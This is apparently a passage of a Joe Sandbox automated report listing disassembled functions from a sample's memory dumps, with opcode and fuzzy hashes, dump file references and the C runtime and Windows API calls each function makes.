                                                      • Instruction Fuzzy Hash: BBF0E575BD43407FF6388A059CA3F6772B59B86F08F206018B3023F6E2D5A2B855866D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 721bacb244745aa3665c00bf157a8ba4707d90d4aca754e249bbe8ecbde637e2
                                                      • Instruction ID: fac9745fa33257a8453d8f9e56548693eb59371352d940480ae192cf06c149b0
                                                      • Opcode Fuzzy Hash: 721bacb244745aa3665c00bf157a8ba4707d90d4aca754e249bbe8ecbde637e2
                                                      • Instruction Fuzzy Hash: A3D02B74D0420087D208DB20EC4197A7233DB65308F386439E49B43363ED20A91DC542
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                      • Instruction ID: 3238d5b5f655995793f140008caa56fbb8ad0b90da2b1c87a4cb5ca6660cae4d
                                                      • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                      • Instruction Fuzzy Hash: DAD0A771A487A10E57588D3804A047BFBF8EA47722B18249FE5E6E3209D224DD018698
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9cb6bde4bb873ffcf0c8b61d618761c2bee8ba48cc3ce9c6d3c5b9fad58cfbb5
                                                      • Instruction ID: e184d0a2009750b607d30f7eabbda1db781380bb2a674d16d38b4769f66a788e
                                                      • Opcode Fuzzy Hash: 9cb6bde4bb873ffcf0c8b61d618761c2bee8ba48cc3ce9c6d3c5b9fad58cfbb5
                                                      • Instruction Fuzzy Hash: F3C02B2084C2C047D378CB208C6EAF1FF355C43004E2C309FC0D117C43E0004001431E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 57ddfbdb33046e0c948dbfd7e151f830fd57b35c950b95db17ac49caf2ca002d
                                                      • Instruction ID: e8d8ce22639c2c99d03c1469624dd66e1f707675331acfe3843cda0122171aa3
                                                      • Opcode Fuzzy Hash: 57ddfbdb33046e0c948dbfd7e151f830fd57b35c950b95db17ac49caf2ca002d
                                                      • Instruction Fuzzy Hash: 8CC04C24E591909AE100DF1699405B1626A57D6205714F0105045A7399CD35E4078618
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f2fd6eb2bc6aba0ac7b264a4af10500b53977dce8411845aabe77a6d53e31c5
                                                      • Instruction ID: 75d658112eb524b8c7f558e9921f8fc4c749a34bbdaebc54924007241f36d986
                                                      • Opcode Fuzzy Hash: 4f2fd6eb2bc6aba0ac7b264a4af10500b53977dce8411845aabe77a6d53e31c5
                                                      • Instruction Fuzzy Hash: 93C09B34F5D1905FE604DF15D9514B572BB57C7305714F0146005E339DCD35D407861C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?,?,?), ref: 00D30790
                                                      • _malloc.LIBCMT ref: 00D307C9
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 00D307FC
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?), ref: 00D30818
                                                      • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00D30852
                                                      • _malloc.LIBCMT ref: 00D3088B
                                                      • __freea.LIBCMT ref: 00D308EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$_malloc$__freea
                                                      • String ID:
                                                      • API String ID: 1187765244-0
                                                      • Opcode ID: 4eb80a7f47335b4c1cd336f3bd81a73eca17d5afdd960ab8ec311c939f28fe79
                                                      • Instruction ID: ebcef5e25f3425da85e12dd7bdc9bff275036566b47b736434c2abce06852d0d
                                                      • Opcode Fuzzy Hash: 4eb80a7f47335b4c1cd336f3bd81a73eca17d5afdd960ab8ec311c939f28fe79
                                                      • Instruction Fuzzy Hash: 98B1DCB2800219AFDF21AFA4DCA19AE3FB6EF48354F184529FA55A6151D330CD61DFB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • TlsSetValue.KERNEL32(00000000,00000000,?,?,00D2D7FD), ref: 00D2EFBB
                                                      • __init_pointers.LIBCMT ref: 00D2EFC5
                                                      • __mtterm.LIBCMT ref: 00D2F07B
                                                        • Part of subcall function 00D2EBA4: TlsFree.KERNEL32(00000003,00D2D892), ref: 00D2EBCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: FreeValue__init_pointers__mtterm
                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                      • API String ID: 3928193026-3819984048
                                                      • Opcode ID: de206732501cb5f0b17d62e71b4d5741fb1a20c6237d5911e6165eab38c113d8
                                                      • Instruction ID: 403f9076e53de5778ce7411ce6c0ef46b7069614c4b524a831d5c4af8610ce0f
                                                      • Opcode Fuzzy Hash: de206732501cb5f0b17d62e71b4d5741fb1a20c6237d5911e6165eab38c113d8
                                                      • Instruction Fuzzy Hash: 1E31607C800321ABDB20AF75BD06A567BE4FB66768B190929F40CD33E1EB71C4818E70
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __CreateFrameInfo.LIBCMT ref: 00D3274D
                                                        • Part of subcall function 00D2DE53: __getptd.LIBCMT ref: 00D2DE61
                                                        • Part of subcall function 00D2DE53: __getptd.LIBCMT ref: 00D2DE6F
                                                      • __getptd.LIBCMT ref: 00D32757
                                                        • Part of subcall function 00D2ED41: __amsg_exit.LIBCMT ref: 00D2ED51
                                                      • __getptd.LIBCMT ref: 00D32765
                                                      • __getptd.LIBCMT ref: 00D32773
                                                      • __getptd.LIBCMT ref: 00D3277E
                                                      • _CallCatchBlock2.LIBCMT ref: 00D327A4
                                                        • Part of subcall function 00D2DEF8: __CallSettingFrame@12.LIBCMT ref: 00D2DF44
                                                        • Part of subcall function 00D3284B: __getptd.LIBCMT ref: 00D3285A
                                                        • Part of subcall function 00D3284B: __getptd.LIBCMT ref: 00D32868
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
                                                      • String ID:
                                                      • API String ID: 3688206559-0
                                                      • Opcode ID: 8073c8ead9066b99b9c2bccd5036c5b887a55bd1382170aeb75f762e620e69be
                                                      • Instruction ID: b7a49d4139cf46befdeee62050f66e08e7680088b48853879aaafe870a922738
                                                      • Opcode Fuzzy Hash: 8073c8ead9066b99b9c2bccd5036c5b887a55bd1382170aeb75f762e620e69be
                                                      • Instruction Fuzzy Hash: B011B2B1C002199FDB00EFA4D846BAD7BB0FF18318F148569F854AB251DB389A159B70
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: __getptd$__amsg_exit
                                                      • String ID: MOC$csm
                                                      • API String ID: 1969926928-1389381023
                                                      • Opcode ID: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
                                                      • Instruction ID: 2a40d5fccc28a2875b6d07e2fb250bfddf8353138d900e762c0306b9d0f460ba
                                                      • Opcode Fuzzy Hash: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
                                                      • Instruction Fuzzy Hash: 7DE0EC369102248FD710AB68D446B7837A5FF79318F5E45E1E44CCB223DB78E8909A72
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 00D379E1
                                                      • __FindPESection.LIBCMT ref: 00D379FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                      • String ID:
                                                      • API String ID: 876702719-0
                                                      • Opcode ID: a6a8e14c1055e0fa927571e4b40f998dbacb5d3e95717f12630a569fbbe88f48
                                                      • Instruction ID: e1b92ec6dda5f39d2cc458ddf63f58ceeb9d4875a1f4f6d562fcf15cfe32456f
                                                      • Opcode Fuzzy Hash: a6a8e14c1055e0fa927571e4b40f998dbacb5d3e95717f12630a569fbbe88f48
                                                      • Instruction Fuzzy Hash: B091B5BAA08A198BCB24CF58D84076EB3B6FF89350F194269D815D7390D735ED46CBB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00D3402F,00000001,00000000,?), ref: 00D33EEB
                                                      • _memset.LIBCMT ref: 00D33F40
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,00000000,00000001,?), ref: 00D33F55
                                                      • __freea.LIBCMT ref: 00D33F6D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea_memset
                                                      • String ID:
                                                      • API String ID: 2568176243-0
                                                      • Opcode ID: dc3eaf3ba3840c8a73b29357924586a033fae5d86e6c1fa0e47ce3e0c04fc2aa
                                                      • Instruction ID: 7baf0a5eb730ba082407fecd36cd319e1914b73ebd2ae6e4d3e8ff294d279535
                                                      • Opcode Fuzzy Hash: dc3eaf3ba3840c8a73b29357924586a033fae5d86e6c1fa0e47ce3e0c04fc2aa
                                                      • Instruction Fuzzy Hash: 7351AAB290015AAFDF10AFA4DD81CAF7BB9EF48364F584529FA14D7150D631CE618BB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D35968
                                                      • __isleadbyte_l.LIBCMT ref: 00D3599C
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,?), ref: 00D359CD
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,?), ref: 00D35A3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 8cdf980c78e358ac318674dc660bcfe31279b50ccfb1b8cd524f3004a7681ce5
                                                      • Instruction ID: 92be540417a602bfb8d3bdd58277ae68280249f21f592a41912de877137cab2b
                                                      • Opcode Fuzzy Hash: 8cdf980c78e358ac318674dc660bcfe31279b50ccfb1b8cd524f3004a7681ce5
                                                      • Instruction Fuzzy Hash: D731C031A00686EFCF20DF64E894AAD7BB1EF01320F1989A9E4A58B199D331DD50DB70
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00CE35E1
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 00CE3612
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: E&eb
                                                      • API String ID: 237503144-175690455
                                                      • Opcode ID: 0b8b1efdb047584276b068a62ca768dc44f499f80373f3eb543a1bde6c95bf75
                                                      • Instruction ID: 021d2959513a1b972a0e77d885f78126193ed151b13184a3729cf5f451660541
                                                      • Opcode Fuzzy Hash: 0b8b1efdb047584276b068a62ca768dc44f499f80373f3eb543a1bde6c95bf75
                                                      • Instruction Fuzzy Hash: 3B618471610B405FD328CF34C886B67B7E5EB84314F148A2DE4AAC7791EB74BA458B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 00D01DB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: m%s$!EJK
                                                      • API String ID: 237503144-2691780584
                                                      • Opcode ID: 050febc9ac770022577c90710b3802f2d8eee3b8026d8b83acc54f1e3ef20987
                                                      • Instruction ID: a4d15cd26529558b7e5c6408a740c425b606f9044a6164ac05e78a953dba1cc8
                                                      • Opcode Fuzzy Hash: 050febc9ac770022577c90710b3802f2d8eee3b8026d8b83acc54f1e3ef20987
                                                      • Instruction Fuzzy Hash: CC2198B10083909FD304CF15D891B5BBBF4FB86348F150A1CF9A5AB280D775DA06CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00D2DEA6: __getptd.LIBCMT ref: 00D2DEAC
                                                        • Part of subcall function 00D2DEA6: __getptd.LIBCMT ref: 00D2DEBC
                                                      • __getptd.LIBCMT ref: 00D3285A
                                                        • Part of subcall function 00D2ED41: __amsg_exit.LIBCMT ref: 00D2ED51
                                                      • __getptd.LIBCMT ref: 00D32868
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: __getptd$__amsg_exit
                                                      • String ID: csm
                                                      • API String ID: 1969926928-1018135373
                                                      • Opcode ID: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
                                                      • Instruction ID: 528a50705bc8f16dcf3119a8636b7605a550d5b388ff13bf53d91a5b77e0f97a
                                                      • Opcode Fuzzy Hash: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
                                                      • Instruction Fuzzy Hash: F9013C75C006259BCF349F64D444BBDF7B5EF24311F6C442EE881AA691CB319A94CB71
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%